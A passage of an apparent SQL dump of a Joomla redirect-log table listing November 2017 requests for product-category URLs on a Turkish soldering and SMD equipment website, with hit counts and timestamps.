00:00:00',301),(12548,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,category_name',NULL,'','',43,0,'2017-11-19 12:56:52','0000-00-00 00:00:00',301),(12549,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,ordering',NULL,'','',3,0,'2017-11-19 13:29:42','0000-00-00 00:00:00',301),(12550,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,ordering',NULL,'','',3,0,'2017-11-19 13:39:51','0000-00-00 00:00:00',301),(12551,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,product_name',NULL,'','',3,0,'2017-11-19 14:05:21','0000-00-00 00:00:00',301),(12552,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,ordering/results,1-50',NULL,'','',7,0,'2017-11-19 14:15:20','0000-00-00 00:00:00',301),(12553,'http://3s-technologies.com.tr/index.php/en/products/245-sn63pb37-0.6mm-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-19 14:19:53','0000-00-00 00:00:00',301),(12554,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,category_name/dirdesc',NULL,'','',1,0,'2017-11-19 14:20:30','0000-00-00 00:00:00',301),(12555,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,ordering/results,1-20',NULL,'','',8,0,'2017-11-19 14:30:41','0000-00-00 00:00:00',301),(12556,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,`p`.product_sku',NULL,'','',3,0,'2017-11-19 14:35:55','0000-00-00 00:00:00',301),(12557,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,pc.ordering,product_name',NULL,'','',7,0,'2017-11-19 14:41:00','0000-00-00 00:00:00',301),(12558,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,ordering/results,1-10',NULL,'','',3,0,'2017-11-19 14:41:01','0000-00-00 00:00:00',301),(12559,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/dirdesc/results,1-5',NULL,'','',2,0,'2017-11-19 14:56:21','0000-00-00 00:00:00',301),(12560,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,mf_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-19 14:56:29','0000-00-00 00:00:00',301),(12561,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/dirdesc/results,1-20',NULL,'','',3,0,'2017-11-19 15:01:31','0000-00-00 00:00:00',301),(12562,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-19 15:32:00','0000-00-00 00:00:00',301),(12563,'http://3s-technologies.com.tr/index.php/en/products/245-k100-28-29-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-19 15:36:20','0000-00-00 00:00:00',301),(12564,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-19 15:40:31','0000-00-00 00:00:00',301),(12565,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/dirdesc/results,1-50',NULL,'','',7,0,'2017-11-19 15:42:10','0000-00-00 00:00:00',301),(12566,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,mf_name/results,1-5',NULL,'','',3,0,'2017-11-19 15:52:12','0000-00-00 00:00:00',301),(12567,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_sku/results,1-5',NULL,'','',1,0,'2017-11-19 15:57:19','0000-00-00 00:00:00',301),(12568,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_sku/results,1-5',NULL,'','',1,0,'2017-11-19 16:02:31','0000-00-00 00:00:00',301),(12569,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,mf_name/results,1-20',NULL,'','',6,0,'2017-11-19 16:07:31','0000-00-00 00:00:00',301),(12570,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_sku/results,1-10',NULL,'','',6,0,'2017-11-19 16:12:41','0000-00-00 00:00:00',301),(12571,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/results,1-5',NULL,'','',1,0,'2017-11-19 16:17:40','0000-00-00 00:00:00',301),(12572,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/results,1-20',NULL,'','',4,0,'2017-11-19 16:22:54','0000-00-00 00:00:00',301),(12573,'http://3s-technologies.com.tr/index.php/en/products/avf-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-19 16:26:13','0000-00-00 00:00:00',301),(12574,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,mf_name/results,1-10',NULL,'','',4,0,'2017-11-19 16:27:49','0000-00-00 00:00:00',301),(12575,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_name/dirdesc',NULL,'','',1,0,'2017-11-19 16:33:00','0000-00-00 00:00:00',301),(12576,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,ordering/results,1-5',NULL,'','',1,0,'2017-11-19 16:33:13','0000-00-00 00:00:00',301),(12577,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',487,0,'2017-11-19 16:38:05','0000-00-00 00:00:00',301),(12578,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,mf_name/results,1-10',NULL,'','',4,0,'2017-11-19 16:43:00','0000-00-00 00:00:00',301),(12579,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,ordering/results,1-5',NULL,'','',1,0,'2017-11-19 16:48:00','0000-00-00 00:00:00',301),(12580,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/dirdesc',NULL,'','',5,0,'2017-11-19 16:48:01','0000-00-00 00:00:00',301),(12581,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',501,0,'2017-11-19 16:50:45','0000-00-00 00:00:00',301),(12582,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/dirdesc',NULL,'','',41,0,'2017-11-19 17:28:44','0000-00-00 00:00:00',301),(12583,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,ordering/results,1-5',NULL,'','',3,0,'2017-11-19 17:36:08','0000-00-00 00:00:00',301),(12584,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by,mf_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-11-19 17:39:42','0000-00-00 00:00:00',301),(12585,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,mf_name/results,1-20',NULL,'','',4,0,'2017-11-19 17:46:15','0000-00-00 00:00:00',301),(12586,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/results,1-10',NULL,'','',6,0,'2017-11-19 17:51:16','0000-00-00 00:00:00',301),(12587,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/t_pb3_s_250x250.jpg',NULL,'','',9,0,'2017-11-19 17:51:51','0000-00-00 00:00:00',301),(12588,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,category_name/dirdesc',NULL,'','',5,0,'2017-11-19 17:56:26','0000-00-00 00:00:00',301),(12589,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,ordering/results,1-50',NULL,'','',1,0,'2017-11-19 18:06:37','0000-00-00 00:00:00',301),(12590,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,product_name',NULL,'','',22,0,'2017-11-19 18:11:46','0000-00-00 00:00:00',301),(12591,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/results,1-50',NULL,'','',1,0,'2017-11-19 18:16:47','0000-00-00 00:00:00',301),(12592,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,ordering/results,1-5',NULL,'','',3,0,'2017-11-19 18:21:56','0000-00-00 00:00:00',301),(12593,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,ordering/results,1-20',NULL,'','',5,0,'2017-11-19 18:27:06','0000-00-00 00:00:00',301),(12594,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,mf_name/results,1-50',NULL,'','',1,0,'2017-11-19 18:32:17','0000-00-00 00:00:00',301),(12595,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,ordering/results,1-10',NULL,'','',1,0,'2017-11-19 18:37:16','0000-00-00 00:00:00',301),(12596,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,ordering/results,1-50',NULL,'','',3,0,'2017-11-19 18:47:35','0000-00-00 00:00:00',301),(12597,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/results,1-5',NULL,'','',4,0,'2017-11-19 18:52:45','0000-00-00 00:00:00',301),(12598,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_sku/results,1-5',NULL,'','',4,0,'2017-11-19 19:03:06','0000-00-00 00:00:00',301),(12599,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı?language=en-gb',NULL,'','',2,0,'2017-11-19 19:07:19','0000-00-00 00:00:00',301),(12600,'http://www.3s-technologies.com.tr/en/products/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2017-11-19 19:32:37','0000-00-00 00:00:00',301),(12601,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/results,1-5',NULL,'','',4,0,'2017-11-19 19:38:49','0000-00-00 00:00:00',301),(12602,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/results,1-10',NULL,'','',4,0,'2017-11-19 19:48:47','0000-00-00 00:00:00',301),(12603,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_sku/results,1-20',NULL,'','',1,0,'2017-11-19 19:53:47','0000-00-00 00:00:00',301),(12604,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_sku/results,1-50',NULL,'','',4,0,'2017-11-19 19:58:46','0000-00-00 00:00:00',301),(12605,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/results,1-5',NULL,'','',1,0,'2017-11-19 20:03:56','0000-00-00 00:00:00',301),(12606,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_sku/results,1-10',NULL,'','',1,0,'2017-11-19 20:08:56','0000-00-00 00:00:00',301),(12607,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,ordering/results,1-5',NULL,'','',4,0,'2017-11-19 20:13:56','0000-00-00 00:00:00',301),(12608,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/results,1-50',NULL,'','',1,0,'2017-11-19 20:18:56','0000-00-00 00:00:00',301),(12609,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,product_sku/results,1-5',NULL,'','',4,0,'2017-11-19 20:23:59','0000-00-00 00:00:00',301),(12610,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,mf_name/dirdesc?language=en-gb',NULL,'','',15,0,'2017-11-19 20:28:29','0000-00-00 00:00:00',301),(12611,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,product_sku',NULL,'','',49,0,'2017-11-19 20:32:49','0000-00-00 00:00:00',301),(12612,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name/results,1-5',NULL,'','',1,0,'2017-11-19 20:34:15','0000-00-00 00:00:00',301),(12613,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_sku/results,1-50',NULL,'','',1,0,'2017-11-19 20:44:36','0000-00-00 00:00:00',301),(12614,'http://www.3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/results,1-20',NULL,'','',11,0,'2017-11-19 20:44:38','0000-00-00 00:00:00',301),(12615,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/le40v_400x214_250x250.jpg',NULL,'','',1,0,'2017-11-19 20:50:04','0000-00-00 00:00:00',301),(12616,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_sku/results,1-20',NULL,'','',3,0,'2017-11-19 20:54:55','0000-00-00 00:00:00',301),(12617,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_sku/results,1-50',NULL,'','',4,0,'2017-11-19 21:00:06','0000-00-00 00:00:00',301),(12618,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,ordering/results,1-50',NULL,'','',4,0,'2017-11-19 21:05:06','0000-00-00 00:00:00',301),(12619,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_name/results,1-5',NULL,'','',1,0,'2017-11-19 21:50:33','0000-00-00 00:00:00',301),(12620,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-26-detail',NULL,'','',73,0,'2017-11-19 22:05:36','0000-00-00 00:00:00',301),(12621,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,category_name/dirdesc',NULL,'','',1,0,'2017-11-19 22:05:52','0000-00-00 00:00:00',301),(12622,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/results,1-20',NULL,'','',6,0,'2017-11-19 22:36:30','0000-00-00 00:00:00',301),(12623,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_name/results,1-10',NULL,'','',3,0,'2017-11-19 22:51:50','0000-00-00 00:00:00',301),(12624,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,ordering/results,1-10',NULL,'','',3,0,'2017-11-19 22:59:29','0000-00-00 00:00:00',301),(12625,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,ordering/results,1-10',NULL,'','',1,0,'2017-11-19 23:07:10','0000-00-00 00:00:00',301),(12626,'http://www.3s-technologies.com.tr/en/products/smd-fırın/by,ordering/results,1-50',NULL,'','',15,0,'2017-11-19 23:22:28','0000-00-00 00:00:00',301),(12627,'http://www.3s-technologies.com.tr/en/products/bã¶lgesel-lehimleme/by,product_name',NULL,'','',2,0,'2017-11-19 23:34:24','0000-00-00 00:00:00',301),(12628,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/results,1-10',NULL,'','',4,0,'2017-11-19 23:37:47','0000-00-00 00:00:00',301),(12629,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,ordering/results,1-20',NULL,'','',3,0,'2017-11-20 00:00:46','0000-00-00 00:00:00',301),(12630,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,ordering/results,1-20',NULL,'','',3,0,'2017-11-20 00:08:25','0000-00-00 00:00:00',301),(12631,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,`p`.product_sku/results,1-5',NULL,'','',5,0,'2017-11-20 01:02:02','0000-00-00 00:00:00',301),(12632,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_sku/results,1-5',NULL,'','',8,0,'2017-11-20 01:09:41','0000-00-00 00:00:00',301),(12633,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by?`p`.product_sku/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-20 01:16:16','0000-00-00 00:00:00',301),(12634,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by?`p`.product_sku/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-20 01:16:36','0000-00-00 00:00:00',301),(12635,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by,ordering?language=en-gb',NULL,'','',14,0,'2017-11-20 01:16:42','0000-00-00 00:00:00',301),(12636,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by?language=en-gb&ordering',NULL,'','',1,0,'2017-11-20 01:16:50','0000-00-00 00:00:00',301),(12637,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',9,0,'2017-11-20 01:17:13','0000-00-00 00:00:00',301),(12638,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,ordering/results,1-50',NULL,'','',10,0,'2017-11-20 01:17:21','0000-00-00 00:00:00',301),(12639,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer',NULL,'','',1,0,'2017-11-20 01:17:40','0000-00-00 00:00:00',301),(12640,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by?language=en-gb&mf_name/dirdesc',NULL,'','',1,0,'2017-11-20 01:17:51','0000-00-00 00:00:00',301),(12641,'http://3s-technologies.com.tr/en/products/manufacturers/aqueous',NULL,'','',31,0,'2017-11-20 01:18:13','0000-00-00 00:00:00',301),(12642,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-20 01:18:15','0000-00-00 00:00:00',301),(12643,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-hızlı',NULL,'','',426,0,'2017-11-20 01:18:15','0000-00-00 00:00:00',301),(12644,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-20 01:18:18','0000-00-00 00:00:00',301),(12645,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-20 01:18:22','0000-00-00 00:00:00',301),(12646,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,category_name',NULL,'','',19,0,'2017-11-20 01:18:22','0000-00-00 00:00:00',301),(12647,'http://3s-technologies.com.tr/en/products/cm-602-l-detail?tmpl=component&print=1',NULL,'','',13,0,'2017-11-20 01:18:26','0000-00-00 00:00:00',301),(12648,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by?language=en-gb&ordering',NULL,'','',1,0,'2017-11-20 01:18:28','0000-00-00 00:00:00',301),(12649,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',422,0,'2017-11-20 01:18:29','0000-00-00 00:00:00',301),(12650,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-20 01:18:42','0000-00-00 00:00:00',301),(12651,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_name/results,1-50',NULL,'','',7,0,'2017-11-20 01:25:00','0000-00-00 00:00:00',301),(12652,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by?language=en-gb&mf_name/dirdesc',NULL,'','',1,0,'2017-11-20 01:26:51','0000-00-00 00:00:00',301),(12653,'http://3s-technologies.com.tr/index.php/tr/ueruenler/jv131-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-11-20 01:51:20','0000-00-00 00:00:00',301),(12654,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,mf_name',NULL,'','',26,0,'2017-11-20 01:55:36','0000-00-00 00:00:00',301),(12655,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rl132_250x250.jpg',NULL,'','',1,0,'2017-11-20 02:03:02','0000-00-00 00:00:00',301),(12656,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_sku/results,1-10',NULL,'','',4,0,'2017-11-20 02:18:37','0000-00-00 00:00:00',301),(12657,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic',NULL,'','',27,0,'2017-11-20 02:46:57','0000-00-00 00:00:00',301),(12658,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,product_sku',NULL,'','',10,0,'2017-11-20 03:02:42','0000-00-00 00:00:00',301),(12659,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_name/results,1-20',NULL,'','',4,0,'2017-11-20 03:04:35','0000-00-00 00:00:00',301),(12660,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim',NULL,'','',422,0,'2017-11-20 03:06:40','0000-00-00 00:00:00',301),(12661,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/gf-12-hc-ht-detail?tmpl=component&print=1',NULL,'','',4,0,'2017-11-20 03:12:14','0000-00-00 00:00:00',301),(12662,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-20 03:13:11','0000-00-00 00:00:00',301),(12663,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-20 03:14:55','0000-00-00 00:00:00',301),(12664,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&itemid=55&lang=tr',NULL,'','',6,0,'2017-11-20 03:29:54','0000-00-00 00:00:00',301),(12665,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/results,1-20',NULL,'','',7,0,'2017-11-20 03:35:13','0000-00-00 00:00:00',301),(12666,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,product_sku/results,1-5',NULL,'','',1,0,'2017-11-20 03:42:52','0000-00-00 00:00:00',301),(12667,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku',NULL,'','',342,0,'2017-11-20 03:44:25','0000-00-00 00:00:00',301),(12668,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',350,0,'2017-11-20 03:44:36','0000-00-00 00:00:00',301),(12669,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name',NULL,'','',342,0,'2017-11-20 03:44:59','0000-00-00 00:00:00',301),(12670,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,category_name/dirdesc',NULL,'','',343,0,'2017-11-20 03:45:09','0000-00-00 00:00:00',301),(12671,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name',NULL,'','',339,0,'2017-11-20 03:45:29','0000-00-00 00:00:00',301),(12672,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',341,0,'2017-11-20 03:45:37','0000-00-00 00:00:00',301),(12673,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',374,0,'2017-11-20 03:46:30','0000-00-00 00:00:00',301),(12674,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',379,0,'2017-11-20 03:48:08','0000-00-00 00:00:00',301),(12675,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',388,0,'2017-11-20 03:48:29','0000-00-00 00:00:00',301),(12676,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',381,0,'2017-11-20 03:48:36','0000-00-00 00:00:00',301),(12677,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',381,0,'2017-11-20 03:49:00','0000-00-00 00:00:00',301),(12678,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',383,0,'2017-11-20 03:49:07','0000-00-00 00:00:00',301),(12679,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',376,0,'2017-11-20 03:49:29','0000-00-00 00:00:00',301),(12680,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',382,0,'2017-11-20 03:49:42','0000-00-00 00:00:00',301),(12681,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',377,0,'2017-11-20 03:49:53','0000-00-00 00:00:00',301),(12682,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',391,0,'2017-11-20 03:50:07','0000-00-00 00:00:00',301),(12683,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',384,0,'2017-11-20 03:50:13','0000-00-00 00:00:00',301),(12684,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,`p`.product_sku',NULL,'','',387,0,'2017-11-20 03:50:41','0000-00-00 00:00:00',301),(12685,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-20 03:51:21','0000-00-00 00:00:00',301),(12686,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,product_sku',NULL,'','',384,0,'2017-11-20 03:52:50','0000-00-00 00:00:00',301),(12687,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_name/results,1-5',NULL,'','',4,0,'2017-11-20 04:05:23','0000-00-00 00:00:00',301),(12688,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-20 04:15:21','0000-00-00 00:00:00',301),(12689,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer',NULL,'','',44,0,'2017-11-20 04:17:34','0000-00-00 00:00:00',301),(12690,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-20 04:18:25','0000-00-00 00:00:00',301),(12691,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by?category_name/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-20 04:18:51','0000-00-00 00:00:00',301),(12692,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,ordering?language=en-gb',NULL,'','',8,0,'2017-11-20 04:19:21','0000-00-00 00:00:00',301),(12693,'https://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-20 04:19:54','0000-00-00 00:00:00',301),(12694,'http://www.3s-technologies.com.tr/en/products/smd-orta-hä±zlä±/am100-detail',NULL,'','',3,0,'2017-11-20 04:25:06','0000-00-00 00:00:00',301),(12695,'http://3s-technologies.com.tr/en/products/smd-ultra-hız',NULL,'','',401,0,'2017-11-20 04:41:27','0000-00-00 00:00:00',301),(12696,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hä±zlä±',NULL,'','',5,0,'2017-11-20 04:50:10','0000-00-00 00:00:00',301),(12697,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-41-42-detail',NULL,'','',23,0,'2017-11-20 04:52:41','0000-00-00 00:00:00',301),(12698,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/dirdesc',NULL,'','',8,0,'2017-11-20 04:55:47','0000-00-00 00:00:00',301),(12699,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/by,product_sku/results,1-20',NULL,'','',5,0,'2017-11-20 05:02:59','0000-00-00 00:00:00',301),(12700,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',392,0,'2017-11-20 05:09:33','0000-00-00 00:00:00',301),(12701,'http://3s-technologies.com.tr/en/products/manufacturer/?categorylayout=0&showcategory=1&showproducts=1&showsearch=1&productsublayout=0&latest=0&topten=0&recent=0',NULL,'','',25,0,'2017-11-20 05:12:30','0000-00-00 00:00:00',301),(12702,'http://www.3s-technologies.com.tr/en/github.com/joomla',NULL,'','',14,0,'2017-11-20 05:30:53','0000-00-00 00:00:00',301),(12703,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/dirdesc?language=tr-tr',NULL,'','',23,0,'2017-11-20 05:33:17','0000-00-00 00:00:00',301),(12704,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın/by,product_sku/results,1-50',NULL,'','',3,0,'2017-11-20 05:46:11','0000-00-00 00:00:00',301),(12705,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-11-20 